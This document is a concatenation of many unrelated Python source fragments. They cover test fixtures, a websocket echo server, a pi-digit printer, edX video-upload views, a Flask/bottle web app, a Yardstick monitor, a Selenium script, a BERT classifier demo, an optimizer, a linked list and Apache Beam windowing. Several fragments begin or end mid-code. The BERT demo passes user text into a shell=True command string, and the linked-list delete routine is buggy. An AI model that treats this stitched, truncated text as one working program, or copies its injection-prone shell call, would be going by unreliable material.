"""Defines chart-wide shared test fixtures.""" import numpy as np import pandas as pd import pytest from bokeh.sampledata.autompg import autompg class TestData(object): """Contains properties with easy access to data used across tests.""" def __init__(self): self.cat_list = ['a', 'c', 'a', 'b'] self.list_data = [[1, 2, 3, 4], [2, 3, 4, 5]] self.array_data = [np.array(item) for item in self.list_data] self.dict_data = {'col1': self.list_data[0], 'col2': self.list_data[1]} self.pd_data = pd.DataFrame(self.dict_data) self.records_data = self.pd_data.to_dict(orient='records') self.auto_data = autompg @pytest.fixture(scope='module') def test_data(): return TestData() @pytest.fixture(scope='module') def wide_data_with_cat(test
_data): data = test_data.dict_data.copy() data['col3'] = test_data.cat_list return data @pytest.fixture(scope='module') def df_with_cat_index(test_data): return pd.DataFrame(test_data.dict_data, index=test_data.cat
_list)
#!/usr/bin/env python import asyncio import os import signal import websockets async def echo(websocket): asy
nc for message in websocket: awai
t websocket.send(message) async def main(): # Set the stop condition when receiving SIGTERM. loop = asyncio.get_running_loop() stop = loop.create_future() loop.add_signal_handler(signal.SIGTERM, stop.set_result, None) async with websockets.serve( echo, host="localhost", port=8000 + int(os.environ["SUPERVISOR_PROCESS_NAME"][-2:]), ): await stop if __name__ == "__main__": asyncio.run(main())
#! /usr/bin/env python # Print digits of pi forever. # # The algorithm, using Python's 'long' integers ("bignums"), works # with continued fractions, and was conceived by Lambert Meertens. # # See also the ABC Programmer's Handbook, by Geurts, Meertens & Pemberton, # published by Prentice-Hall (UK) Ltd., 1990. import sys def main(): k, a, b, a1, b1 = 2L, 4L, 1L, 12L, 4L while 1: # Next approximation p, q, k = k*k, 2L*k+1L, k+1L a, b, a1, b1 = a1, b1, p*a+q*a1, p*b+q*b1 # Print common digits d, d1 = a//b,
a1//b1 while d == d1: output(d)
a, a1 = 10L*(a%b), 10L*(a1%b1) d, d1 = a//b, a1//b1 def output(d): # Use write() to avoid spaces between the digits # Use str() to avoid the 'L' sys.stdout.write(str(d)) # Flush so the output is seen immediately sys.stdout.flush() if __name__ == "__main__": main()
or a CSV file column # containing URLs for video encodings for the named profile # (e.g. desktop, mobile high quality, mobile low quality) return _("{profile_name} URL").format(profile_name=profile) profile_whitelist = VideoUploadConfig.get_profile_whitelist() videos = list(_get_videos(course)) name_col = _("Name") duration_col = _("Duration") added_col = _("Date Added") video_id_col = _("Video ID") status_col = _("Status") profile_cols = [get_profile_header(profile) for profile in profile_whitelist] def make_csv_dict(video): """ Makes a dictionary suitable for writing CSV output. This involves extracting the required items from the original video dict and converting all keys and values to UTF-8 encoded string objects, because the CSV module doesn't play well with unicode objects. """ # Translators: This is listed as the duration for a video that has not # yet reached the point in its processing by the servers where its # duration is determined. duration_val = str(video["duration"]) if video["duration"] > 0 else _("Pending") ret = dict( [ (name_col, video["client_video_id"]), (duration_col, duration_val), (added_col, video["created"].isoformat()), (video_id_col, video["edx_video_id"]), (status_col, video["status"]), ] + [ (get_profile_header(encoded_video["profile"]), encoded_video["url"]) for encoded_video in video["encoded_videos"] if encoded_video["profile"] in profile_whitelist ] ) return { key.encode("utf-8"): value.encode("utf-8") for key, value in ret.items() } response = HttpResponse(content_type="text/csv") # Translators: This is the suggested filename when downloading the URL # listing for videos uploaded through Studio filename = _("{course}_video_urls").format(course=course.id.course) # See https://tools.ietf.org/html/rfc6266#appendix-D response["Content-Disposition"] = rfc6266.build_header( filename + ".csv", filename_compat="video_urls.csv" ) writer = csv.DictWriter( response, [ col_name.encode("utf-8") for col_name in [name_col, duration_col, added_col, video_id_col, status_col] + profile_cols ], dialect=csv.excel ) writer.writeheader() for video in videos: writer.writerow(make_csv_dict(video)) return response def _get_and_validate_course(course_key_string, user): """ Given a course key, return the course if it exists, the given user has access to it, and it is properly configured for video uploads """ course_key = CourseKey.from_string(course_key_string) # For now, assume all studio users that have access to the course can upload videos. # In the future, we plan to add a new org-level role for video uploaders. course = get_course_and_check_access(course_key, user) if ( settings.FEATURES["ENABLE_VIDEO_UPLOAD_PIPELINE"] and getattr(settings, "VIDEO_UPLOAD_PIPELINE", None) and course and course.video_pipeline_configured ): return course else: return None def _get_videos(course): """ Retrieves the list of videos from VAL corresponding to the videos listed in the asset metadata store. """ edx_videos_ids = [ v.asset_id.path for v in modulestore().get_all_asset_metadata(course.id, VIDEO_ASSET_TYPE) ] videos = list(get_videos_for_ids(edx_videos_ids, VideoSortField.created, SortDirection.desc)) # convert VAL's status to studio's Video Upload feature status. for video in videos: video["status"] = StatusDisplayStrings.get(video["status"]) return videos def _get_index_videos(course): """ Returns the information about each video upload required for the video list """ return list( { attr: video[attr] for attr in ["edx_video_id", "client_video_id", "created", "duration", "status"] } for video in _get_videos(course) ) def videos_index_html(course): """ Returns an HTML page to display previous video uploads and allow new ones """ return render_to_response( "videos_index.html", { "context_course": course, "post_url": reverse_course_url("videos_handler", unicode(course.id)), "encodings_download_url": reverse_course_url("video_encodings_download", unicode(course.id)), "previous_uploads": _get_index_videos(course), "concurrent_upload_limit": settings.VIDEO_UPLOAD_PIPELINE.get("CONCURRENT_UPLOAD_LIMIT", 0), } ) def videos_index_json(course): """ Returns JSON in the following format: { "videos": [{ "edx_video_id": "aaaaaaaa-aaaa-4aaa-aaaa-aaaaaaaaaaaa", "client_video_id": "video.mp4", "created": "1970-01-01T00:00:00Z", "duration": 42.5, "status": "upload" }] } """ return JsonResponse({"videos": _get_index_videos(course)}, status=200) def videos_post(course, request): """ Input (JSON): { "files": [{ "file_name": "video.mp4", "content_type": "video/mp4" }] } Returns (JSON): { "files": [{ "file_name": "video.mp4", "upload_url": "http://example.com/put_video" }] } The returned array corresponds exactly to the input array. """ error = None if "files" not in request.json: error = "Request object is not JSON or does not contain 'files'" elif any( "file_name" not in file or "content_type" not in file for file in request.json["files"] ): error = "Request 'files' entry does not contain 'file_name' and 'content_type'" if error: return JsonResponse({"error": error}, status=400) bucket = storage_service_bucket() course_video_upload_token = course.video_upload_pipeline["course_video_upload_token"] req_files = request.json["files"] resp_files = [] for req_file in req_files: file_name = req_file["file_name"] edx_video_id = unicode(uuid4()) key = storage_service_key(bucket, file_name=edx_video_id) for metadata_name, value in [ ("course_video_upload_token", course_video_upload_token), ("client_video_id", file_name), ("course_key", unicode(course.id)), ]: key.set_metadata(metadata_name, value) upload_url = key.generate_url( KEY_EXPIRATION_IN_SECONDS, "PUT", headers={"Content-Type": req_file["content_type"]} ) # persist edx_video_id as uploaded through this course video_meta_data = AssetMetadata(course.id.make_asset_key(VIDEO_ASSET_TYPE, edx_video_id)) modulestore().save_asset_metadata(video_meta_data, request.user.id) # persist edx_video_id in VAL create_video({ "edx_video_id": edx_video_id, "status": "upload", "client_video_id": file_name, "duration": 0, "encoded_videos": [], }) resp_files.append({"fil
e_name": file_name, "upload_url": upload_url}) return JsonResponse({"files": resp_files}, status=200) def storage_service_bucket(): """ Returns an S3 bucket for video uploads. """ conn = s3.connection.S3Connection( settings.AWS
_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY ) return conn.get_bucket(settings.VIDEO_UPLOAD_PIPELINE["BUCKET"]) def storage_service_key(bucket, file_name): """ Returns an S3 key to the given file in the given bucket. """ key_name = "{}/{}".format( settings.VIDEO_UPLOAD_PIPELINE.get("ROOT_PATH", ""), file_name ) return s3.k
import click from do_cli.contexts import CTX from do_cli.commands.common import host_commands @click.command('list') @click.option('-f', '--force-refresh', is_flag=True, help='Pull data from the API') @click.option('-h', '--host-names', help='Comma separated list of host names') @CTX def cli(ctx, force_refresh, host_names): """ Show minimal data for droplets --host-names -h Comma separated list of ho
st names Show minimal data for specific droplets """ if ctx.verbose: click.echo("Show minimal data for droplets") click.echo(host_commands(ctx, force_refresh, host_names)) if ctx.verbose:
click.echo('---- cmd_list done ----')
import base64 import csv import io import multiprocessing import numpy as np import sys from collections import defaultdict from io import StringIO from pathlib import Path # Import matplotlib ourselves and make it use agg (not any GUI anything) # before the analyze module pulls it in. import matplotlib matplotlib.use('Agg') from bottle import get, post, redirect, request, response, jinja2_template as template # noqa: E402 from analysis import heatmaps, process, plot # noqa: E402 from web.error_handlers import TrackParseError # noqa: E402 from common import mkdir # noqa: E402 import config # noqa: E402 def _make_stats_output(stats, all_keys, do_csv): for i in range(len(stats)): stat = stats[i] for k in all_keys: if k in stat: val = stat[k] if isinstance(val, (np.float32, np.float64)): stat[k] = "%0.3f" % val else: stat[k] = "" all_keys.remove('Track file') # will be added as first column all_keys = sorted(list(all_keys)) all_keys[:0] = ['Track file'] # prepend 'Track file' header if do_csv: output = StringIO() writer = csv.DictWriter(output, fieldnames=all_keys) writer.writeheader() for stat in stats: writer.writerow(stat) csvstring = output.getvalue() output.close() response.content_type = 'text/csv' response.headers['Content-Disposition'] = 'attachment; filename=atles_stats.csv' return csvstring else: return template('stats', keys=all_keys, stats=stats) @get('/stats/') def get_stats(): trackrels = request.query.tracks.split('|') exp_type = request.query.exp_type stats = [] all_keys = set() for trackrel in trackrels: curstats = {} curstats['Track file'] = trackrel try: processor = process.TrackProcessor(str(config.TRACKDIR / trackrel)) curstats.update(processor.get_setup(['experiment', 'phases', 'general'])) curstats.update(processor.get_stats_single_table(include_phases=True)) if exp_type: curstats.update(processor.get_exp_stats(exp_type)) except (ValueError, IndexError): # often 'wrong number of columns' due to truncated file from killed experiment raise(TrackParseError(trackrel, sys.exc_info())) all_keys.update(curstats.keys()) stats.append(curstats) return _make_stats_output(stats, all_keys, do_csv=request.query.csv) def _do_analyze(trackrel): trackrel = Path(trackrel) # ensure directories exist for plot creation trackreldir = trackrel.parent mkdir(config.PLOTDIR / trackreldir) # look for debug frames to create links in the trace plot trackname = trackrel.name.replace('-track.csv', '') dbgframedir = config.DBGFRAMEDIR / trackreldir / trackname dbgframes = list(dbgframedir.glob("subframe*.png")) # list so TrackPlotter can re-use (instead of exhausting the iterable) processor = process.TrackProcessor(str(config.TRACKDIR / trackrel)) plotter = plot.TrackPlotter(processor, dbgframes) plotter.plot_heatmap() def saveplot(filename): plot.savefig(str(config.PLOTDIR / filename)) saveplot("{}.10.heat.png".format(trackrel)) plotter.plot_invalidheatmap() saveplot("{}.12.heat.invalid.png".format(trackrel)) if processor.num_phases() > 1: plotter.plot_heatmap(plot_type='per-phase') saveplot("{}.14.heat.perphase.png".format(trackrel)) plotter.plot_heatmap(plot_type='per-minute') saveplot("{}.15.h
eat.perminute.png".format(trackrel)) plotter.plot_trace() saveplot("{}.20.plot.svg".format(trackrel)) @post('/analyze/') def post_analyze(): trackrel = request.query.trackrel try: _do_analyze(trackrel) ex
cept ValueError: # often 'wrong number of columns' due to truncated file from killed experiment raise(TrackParseError(trackrel, sys.exc_info())) redirect("/view/{}".format(trackrel)) def _analyze_selection(trackrels): for trackrel in trackrels: try: _do_analyze(trackrel) except ValueError: # often 'wrong number of columns' due to truncated file from killed experiment pass # nothing to be done here; we're processing in the background @post('/analyze_selection/') def post_analyze_selection(): trackrels = request.query.trackrels.split('|') p = multiprocessing.Process(target=_analyze_selection, args=(trackrels,)) p.start() @get('/heatmaps/') def get_heatmaps(): trackrels = request.query.tracks.split('|') processors = [] # to verify all phases are equivalent plength_map = defaultdict(list) for trackrel in trackrels: try: p = process.TrackProcessor(str(config.TRACKDIR / trackrel), just_raw_data=True) processors.append(p) plength_map[tuple(phase.length for phase in p.phase_list)].append(trackrel) except ValueError: raise(TrackParseError(trackrel, sys.exc_info())) if len(plength_map) > 1: lengths_string = '\n'.join( "{} in:\n {}\n".format( str(lengths), "\n ".join(trackrel for trackrel in plength_map[lengths]) ) for lengths in plength_map ) return template('error', errormsg="The provided tracks do not all have the same phase lengths. Please select tracks that share an experimental setup.<br>Phase lengths found:<pre>{}</pre>".format(lengths_string)) # Save all images as binary to be included in the page directly # Base64-encoded. (Saves having to write temporary data to filesystem.) images_data = [] # use phases from an arbitrary track plengths = plength_map.popitem()[0] dataframes = [proc.df for proc in processors] phase_start = 0 for i, length in enumerate(plengths): phase_end = phase_start + length x, y = heatmaps.get_timeslice(dataframes, phase_start*60, phase_end*60) title = "Phase {} ({}:00-{}:00)".format(i+1, phase_start, phase_end) ax = heatmaps.make_heatmap(x, y, title) plot.format_axis(ax) image_data = io.BytesIO() plot.savefig(image_data, format='png') images_data.append( base64.b64encode(image_data.getvalue()).decode() ) phase_start = phase_end return template('view', imgdatas=images_data)
# project/models.py from project import db from project.uuid_gen import id_column class Payment(db.Model): id = id_column() email = db.Column(db.String(255), unique=False, nullable=False) names = db.Column(db.String(255), unique=False, nullable=False) cardNumber = db.Column(db.String(255), unique=False, nullable=False) phone = db.Column(db.String(255), unique=False, nullable=False) amount = db.Column(db.Float, unique=False, nullable=False) object_payment = db.Column(db.String(255), unique=False, nullable=False) status = db.Column(db.Boolean, nullable=False, default=False) def __init__(self, email, names, card_number, phone, amount, object_payment, status=Fal
se): self.names = names self.email = email self.ca
rdNumber = card_number self.phone = phone self.amount = amount self.object_payment = object_payment self.status = status
############################################################################## # Copyright (c) 2015 Huawei Technologies Co.,Ltd. and others # # All rights reserved. This program and the accompanying materials # are made available under the terms of the Apache License, Version 2.0 # which accompanies this distribution, and is available at # http://www.apache.org/licenses/LICENSE-2.0 ############################################################################## import logging import subprocess import traceback import yardstick.ssh as ssh import basemonitor as basemonitor LOG = logging.getLogger(__name__) def _execute_shell_command(command): '''execute shell script with error handling''' exitcode = 0 output = [] try: output = subprocess.check_output(command, shell=True) except Exception: exitcode = -1 output = traceback.format_exc() LOG.error("exec command '%s' error:\n " % command) LOG.error(traceback.format_exc()) return exitcode, output class MonitorOpenstackCmd(basemonitor.BaseMonitor): """docstring for MonitorApi""" __monitor_type__ = "openstack-cmd" def setup(self): self.connection = None node_name = self._config.get("host", None) if node_name: host = self._context[node_name] ip = host.get("ip", None) user = host.get("user", "root") key_filename = host.get("key_filename", "~/.ssh/id_rsa")
self.connection = ssh.SSH(user, ip, key_filename=key_filename) self.connection.wait(timeout=600) LOG.debug("ssh host success!") self.check_script = self.get_script_fullpath( "ha_tools/check_openstack_cmd.bash") self.cmd = self._config["command_name"] def monitor_func(self):
exit_status = 0 if self.connection: exit_status, stdout, stderr = self.connection.execute( "/bin/bash -s '{0}'".format(self.cmd), stdin=open(self.check_script, "r")) LOG.debug("the ret stats: %s stdout: %s stderr: %s" % (exit_status, stdout, stderr)) else: exit_status, stdout = _execute_shell_command(self.cmd) if exit_status: return False return True def verify_SLA(self): outage_time = self._result.get('outage_time', None) LOG.debug("the _result:%s" % self._result) max_outage_time = self._config["sla"]["max_outage_time"] if outage_time > max_outage_time: LOG.info("SLA failure: %f > %f" % (outage_time, max_outage_time)) return False else: LOG.info("the sla is passed") return True def _test(): # pragma: no cover host = { "ip": "192.168.235.22", "user": "root", "key_filename": "/root/.ssh/id_rsa" } context = {"node1": host} monitor_configs = [] config = { 'monitor_type': 'openstack-cmd', 'command_name': 'nova image-list', 'monitor_time': 1, 'host': 'node1', 'sla': {'max_outage_time': 5} } monitor_configs.append(config) p = basemonitor.MonitorMgr() p.init_monitors(monitor_configs, context) p.start_monitors() p.wait_monitors() p.verify_SLA() if __name__ == '__main__': # pragma: no cover _test()
#coding=utf-8 from selenium import webdriver import pymysql import unittest,time from selenium.webdriver.common.keys import Keys print("test36") wf = webdriver.Firefox() mark_01=0 n=0 wf.get("http://192.168.17.66:8080/LexianManager/html/login.html") wf.find_element_by_xpath(".//*[@id='login']").click() time.sleep(1) wf.find_element_by_xpath(".//*[@id='leftMenus']/div[8]/div[1]/div[2]/a[2]").cli
ck() time.sleep(1) wf.find_element_by_xpath(".//*[@id='leftMenus']/div[8]/div[2]/ul/li[2]/a").click() time.sleep(1) wf.switch_to_frame("manager")
#!/usr/bin/python # -*- coding: utf-8 -*- # # Copyright 2013 The Plaso Project Authors. # Please see the AUTHORS file for details on individual authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distri
buted under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
See the License for the specific language governing permissions and # limitations under the License. """Formatter for Android contacts2.db database events.""" from plaso.lib import eventdata class AndroidCallFormatter(eventdata.ConditionalEventFormatter): """Formatter for Android call history events.""" DATA_TYPE = 'android:event:call' FORMAT_STRING_PIECES = [ u'{call_type}', u'Number: {number}', u'Name: {name}', u'Duration: {duration} seconds'] FORMAT_STRING_SHORT_PIECES = [u'{call_type} Call'] SOURCE_LONG = 'Android Call History' SOURCE_SHORT = 'LOG'
# Copyright 2021 The TensorFlow A
uthors. All Rights Reserved. # # Licensed under the Apache License, Version 2
.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Python demo tool for BertNLClassifier.""" import inspect import os.path as _os_path import subprocess import sys from absl import app from absl import flags FLAGS = flags.FLAGS flags.DEFINE_string('model_path', None, 'Model Path') flags.DEFINE_string('text', None, 'Text to Predict') # Required flag. flags.mark_flag_as_required('model_path') flags.mark_flag_as_required('text') _BERT_NL_CLASSIFIER_NATIVE_PATH = _os_path.join( _os_path.dirname(inspect.getfile(inspect.currentframe())), '../bert_nl_classifier_demo') def classify(model_path, text): """Classifies input text into different categories. Args: model_path: path to model text: input text """ # Run the detection tool: subprocess.run([ _BERT_NL_CLASSIFIER_NATIVE_PATH + ' --model_path=' + model_path + ' --text="' + text + '"' ], shell=True, check=True) def run_main(argv): del argv # Unused. classify(FLAGS.model_path, FLAGS.text) # Simple wrapper to make the code pip-friendly def main(): app.run(main=run_main, argv=sys.argv) if __name__ == '__main__': main()
# [1] https://doi.org/10.1016/0009-2614(91)90115-P # Helgaker, 1991 import numpy as np from scipy.optimize import newton from pysisyphus.tsoptimizers.TSHessianOptimizer import TSHessianOptimizer class TRIM(TSHessianOptimizer): def optimize(self): energy, gradient, H, eigvals, eigvecs, resetted = self.housekeeping() self.update_ts_mode(eigvals, eigvecs) self.log(f"Signs of eigenvalue and -vector of root {self.root} " "will be reversed!") # Transform gradient to basis of eigenvectors gradient_ = eigvecs.T.dot(gradient) # Construct image function by inverting the signs of the eigenvalue and # -vector of
the mode to follow uphill. eigvals_ = eigvals.copy() eigvals_[self.root] *= -1 gradient_ = gradient_.copy() gradient_[s
elf.root] *= -1 def get_step(mu): zetas = -gradient_ / (eigvals_ - mu) # Replace nan with 0. zetas = np.nan_to_num(zetas) # Transform to original basis step = eigvecs * zetas step = step.sum(axis=1) return step def get_step_norm(mu): return np.linalg.norm(get_step(mu)) def func(mu): return get_step_norm(mu) - self.trust_radius mu = 0 norm0 = get_step_norm(mu) if norm0 > self.trust_radius: mu, res = newton(func, x0=mu, full_output=True) assert res.converged self.log(f"Using levelshift of μ={mu:.4f}") else: self.log("Took pure newton step without levelshift") step = get_step(mu) step_norm = np.linalg.norm(step) self.log(f"norm(step)={step_norm:.6f}") self.predicted_energy_changes.append(self.quadratic_model(gradient, self.H, step)) return step
class Node: def __init__(self,val): self.value = val self.nextNode = None def getValue(self): return self.value def getNextNode(self): return self.nextNode def setValue(self,val): self.value = val def setNextNode(self,nxtNode): self.nextNode = nxtNode """ Linked List (LL) Following are the basic operations supported by a list :- 1. Add − Adds an element at the beginning of the list. 2. Deletion − Deletes an element at the beginning of the list. 3. Display − Displays the complete list. 4. Search − Searches an element using the given key. """ class LinkedList: def __init__(self): self.head = None #Returns 'True' or 'False' dependi
ng on the size of the LL def isEmpty(self): if(self.head == None): return True else: return False # Add a node to the head of the LL def add(self,value): temp = Node(value) temp.setNextNode(self.head) self.head = temp
# gives the total number of elements def size(self): temp = self.head count = 0 if(temp != None): count = 1 while(temp.getNextNode() != None): count += 1 temp = temp.getNextNode() return count # prints the elemnts in the List def printList(self): temp = self.head while(temp != None): print (temp.getValue()) temp = temp.getNextNode() def deleteNode(self,key): temp = self.head while(temp != None): nextNode = temp.getNextNode() if(nextNode != None): if(nextNode.getValue() == key): temp = temp.setNextNode(nextNode.getNextNode()) else: temp = temp.getNextNode() if __name__ == "__main__": #Create a new linked list myList = LinkedList() # Add elements to the list myList.add(1) myList.add(2) myList.add(3) myList.add(4) myList.add(5) myList.add(6) myList.add(3) myList.add(7) # Perform operations on the list print ("List Size : " + str(myList.size())) myList.printList() print ("---------------------") myList.deleteNode(3) print ("List Size : " + str(myList.size())) myList.printList()
from flask.ext.flails import FlailsView from flask import render_template, redirect, url_for, request #from config import db import models import forms class PrivatePostView(FlailsView): def private_post_index(self): object_list = models.Post.query.all() return render_template('post/index.slim', object_list=object_list) def private_post_show(self, ident): post = models.Post.query.get(ident) form = forms.CommentForm() return render_template('post/show.slim', post=post, form=form) def private_post_new(self): form = forms.PostForm() if form.validate_on_submit(): post = models.Post(form.name.data, form.title.data, form.content.data) #db.session.add(post) #db.session.commit() return redirect(url_for('post.index')) return render_template('post/new.slim', form=form) def private_post_edit(self, ident): post = models.Post.query.get(ident) form = forms.PostForm(request.form, post) if form.validate_on_submit(): post.name = form.name.data post.title = form.title.data post.content = form.content.data #db.session.add(post) #db.session.commit() return redirect(url_for('post.show', ident=ident)) return render_template('post/edit.slim', form=form, post=post) def private_post_delete(self, ident): post = models.Post.query.get(ident) db.session.delete(post) db.session.commit() return redirect(url_for('post.index')) def private_comment_new(self, post_id): post = models.Post.query.get(post_id) form = forms.CommentForm() if form.validate_on_submit(): comment = models.Comment(form.commenter.data, form.body.data, post_id) #db.sess
ion.add(comment) #db.session.commit() return redirect(url_for('.show', ident=post_id)) return render_template('post/show.slim', post=post, form=form) def private_comment_del
ete(self, post_id, ident): comment = models.Comment.query.get(ident) #db.session.delete(comment) #db.session.commit() return redirect(url_for('.show', ident=post_id))
from flask import Response from flask.views import View from bson import json_util from mcp import mongo class Map(View): def dispatch_request(self, komuna, viti): json = mongo.db.procurements.aggregate([ { "$match": { "komuna.slug": komuna, "viti": viti, "kompania.selia.slug": {'$ne': ''} } }, {
"$group": { "_id": { "selia": "$kompania.selia.slug", "emri": "$kompania.selia.emri", "gjeresi": "$kompania.selia.kordinatat.gjeresi",
"gjatesi": "$kompania.selia.kordinatat.gjatesi", }, "cmimi": { "$sum": "$kontrata.qmimi" }, "vlera": { "$sum": "$kontrata.vlera" }, "numriKontratave": { "$sum": 1 } } }, { "$sort": { "_id.selia": 1 } }, { "$project": { "selia": "$_id.selia", "emri": "$_id.emri", "gjeresia": "$_id.gjeresi", "gjatesia": "$_id.gjatesi", "cmimi": "$cmimi", "vlera": "$vlera", "numriKontratave": "$numriKontratave", "_id": 0 } } ]) json_min_max = mongo.db.procurements.aggregate([ { "$match": { "komuna.slug": komuna, "viti": viti, "kompania.selia.slug": {'$ne': ''} } }, { "$group": { "_id": { "selia": "$kompania.selia.slug", "gjeresi": "$kompania.selia.kordinatat.gjeresi", "gjatesi": "$kompania.selia.kordinatat.gjatesi", }, "sumCmimi": { "$sum": "$kontrata.qmimi" }, "sumVlera": { "$sum": "$kontrata.vlera" }, "sumNumriKontratave": { "$sum": 1 } } }, { "$group": { "_id": {}, "maxCmimi": { "$max": "$sumCmimi" }, "maxVlera": { "$max": "$sumVlera" }, "maxNumriKontratave": { "$max": "$sumNumriKontratave" }, "minCmimi": { "$min": "$sumCmimi" }, "minVlera": { "$min": "$sumVlera" }, "minNumriKontratave": { "$min": "$sumNumriKontratave" }, } }, { "$project": { "_id": 0, "vlera": { "min": "$minVlera", "max": "$maxVlera", }, "cmimi": { "min": "$minCmimi", "max": "$maxCmimi", }, "numriKontratave": { "min": "$minNumriKontratave", "max": "$maxNumriKontratave", } } } ]) #pergjigjen e kthyer dhe te konvertuar ne JSON ne baze te json_util.dumps() e ruajme ne resp result_json = {}; result_json['bounds'] = json_min_max['result'][0] result_json['result'] = json['result'] resp = Response( response=json_util.dumps(result_json), mimetype='application/json') return resp
for the built-in windowing primitives here. Integer or floating point seconds can be passed to these primitives. Internally, seconds, with microsecond granularity, are stored as timeutil.Timestamp and timeutil.Duration objects. This is done to avoid precision errors that would occur with floating point representations. Custom windowing function classes can be created, by subclassing from WindowFn. """ from __future__ import absolute_import import abc from builtins import object from builtins import range from functools import total_ordering from future.utils import with_metaclass from google.protobuf import duration_pb2 from google.protobuf import timestamp_pb2 from apache_beam.coders import coders from apache_beam.portability import common_urns from apache_beam.portability import python_urns from apache_beam.portability.api import beam_runner_api_pb2 from apache_beam.portability.api import standard_window_fns_pb2 from apache_beam.transforms import timeutil from apache_beam.utils import proto_utils from apache_beam.utils import urns from apache_beam.utils import windowed_value from apache_beam.utils.timestamp import MIN_TIMESTAMP from apache_beam.utils.timestamp import Duration from apache_beam.utils.timestamp import Timestamp from apache_beam.utils.windowed_value import WindowedValue __all__ = [ 'TimestampCombiner', 'WindowFn', 'BoundedWindow', 'IntervalWindow', 'TimestampedValue', 'GlobalWindow', 'NonMergingWindowFn', 'GlobalWindows', 'FixedWindows', 'SlidingWindows', 'Sessions', ] # TODO(ccy): revisit naming and semantics once Java Apache Beam finalizes their # behavior. class TimestampCombiner(object): """Determines how output timestamps of grouping operations are assigned.""" OUTPUT_AT_EOW = beam_runner_api_pb2.OutputTime.END_OF_WINDOW OUTPUT_AT_EARLIEST = beam_runner_api_pb2.OutputTime.EARLIEST_IN_PANE OUTPUT_AT_LATEST = beam_runner_api_pb2.OutputTime.LATEST_IN_PANE # TODO(robertwb): Add this to the runner API or remove it. OUTPUT_AT_EARLIEST_TRANSFORMED = 'OUTPUT_AT_EARLIEST_TRANSFORMED' @staticmethod def get_impl(timestamp_combiner, window_fn): if timestamp_combiner == TimestampCombiner.OUTPUT_AT_EOW: return timeutil.OutputAtEndOfWindowImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST: return timeutil.OutputAtEarliestInputTimestampImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_LATEST: return timeutil.OutputAtLatestInputTimestampImpl() elif timestamp_combiner == TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED: return timeutil.OutputAtEarliestTransformedInputTimestampImpl(window_fn) else: raise ValueError('Invalid TimestampCombiner: %s.' % timestamp_combiner) class WindowFn(with_metaclass(abc.ABCMeta, urns.RunnerApiFn)): """An abstract windowing function defining a basic assign and merge.""" class AssignContext(object): """Context passed to WindowFn.assign().""" def __init__(self, timestamp, element=None, window=None): self.timestamp = Timestamp.of(timestamp) self.element = element self.window = window @abc.abstractmethod def assign(self, assign_context): """Associates windows to an element. Arguments: assign_context: Instance of AssignContext. Returns: An iterable of BoundedWindow. """ raise NotImplementedError class MergeContext(object): """Context passed to WindowFn.merge() to perform merging, if any.""" def __init__(self, windows): self.windows = list(windows) def merge(self, to_be_merged, merge_result): raise NotImplementedError @abc.abstractmethod def merge(self, merge_context): """Returns a window that is the result of merging a set of windows.""" raise NotImplementedError def is_merging(self): """Returns whether this WindowFn merges windows.""" return True @abc.abstractmethod def get_window_coder(self): raise NotImplementedError def get_transformed_output_time(self, window, input_timestamp): # pylint: disable=unused-argument """Given input time and output window, returns output time for window. If TimestampCombiner.OUTPUT_AT_EARLIEST_TRANSFORMED is used in the Windowing, the output timestamp for the given window will be the earliest of the timestamps returned by get_transformed_output_time() for elements of the window. Arguments: window: Output window of element. input_timestamp: Input timestamp of element as a timeutil.Timestamp object. Returns: Transformed timestamp. """ # By default, just return the input timestamp. return input_timestamp urns.RunnerApiFn.register_pickle_urn(python_urns.PICKLED_WINDOWFN) class BoundedWindow(object): """A window for timestamps in range (-infinity, end). Attributes: end: End of
window. """ def __init__(self, end): self.end = Timestamp.of(end) def max_timestamp(self): return self.end.predecessor() def __eq__(self, other): raise NotImplementedError def _
_ne__(self, other): # Order first by endpoint, then arbitrarily return self.end != other.end or hash(self) != hash(other) def __lt__(self, other): if self.end != other.end: return self.end < other.end return hash(self) < hash(other) def __le__(self, other): if self.end != other.end: return self.end <= other.end return hash(self) <= hash(other) def __gt__(self, other): if self.end != other.end: return self.end > other.end return hash(self) > hash(other) def __ge__(self, other): if self.end != other.end: return self.end >= other.end return hash(self) >= hash(other) def __hash__(self): raise NotImplementedError def __repr__(self): return '[?, %s)' % float(self.end) @total_ordering class IntervalWindow(windowed_value._IntervalWindowBase, BoundedWindow): """A window for timestamps in range [start, end). Attributes: start: Start of window as seconds since Unix epoch. end: End of window as seconds since Unix epoch. """ def __lt__(self, other): if self.end != other.end: return self.end < other.end return hash(self) < hash(other) def intersects(self, other): return other.start < self.end or self.start < other.end def union(self, other): return IntervalWindow( min(self.start, other.start), max(self.end, other.end)) @total_ordering class TimestampedValue(object): """A timestamped value having a value and a timestamp. Attributes: value: The underlying value. timestamp: Timestamp associated with the value as seconds since Unix epoch. """ def __init__(self, value, timestamp): self.value = value self.timestamp = Timestamp.of(timestamp) def __eq__(self, other): return (type(self) == type(other) and self.value == other.value and self.timestamp == other.timestamp) def __hash__(self): return hash((self.value, self.timestamp)) def __ne__(self, other): return not self == other def __lt__(self, other): if type(self) != type(other): return type(self).__name__ < type(other).__name__ if self.value != other.value: return self.value < other.value return self.timestamp < other.timestamp class GlobalWindow(BoundedWindow): """The default window into which all data is placed (via GlobalWindows).""" _instance = None def __new__(cls): if cls._instance is None: cls._instance = super(GlobalWindow, cls).__new__(cls) return cls._instance def __init__(self): super(GlobalWindow, self).__init__(GlobalWindow._getTimestampFromProto()) self.start = MIN_TIMESTAMP def __repr__(self): return 'GlobalWindow' def __hash__(self): return hash(type(self)) def __eq__(self, other): # Global windows are always and only equal to each other. return self is other or type(self) is type(other) def __ne__(self, other): return not self == other @staticmethod 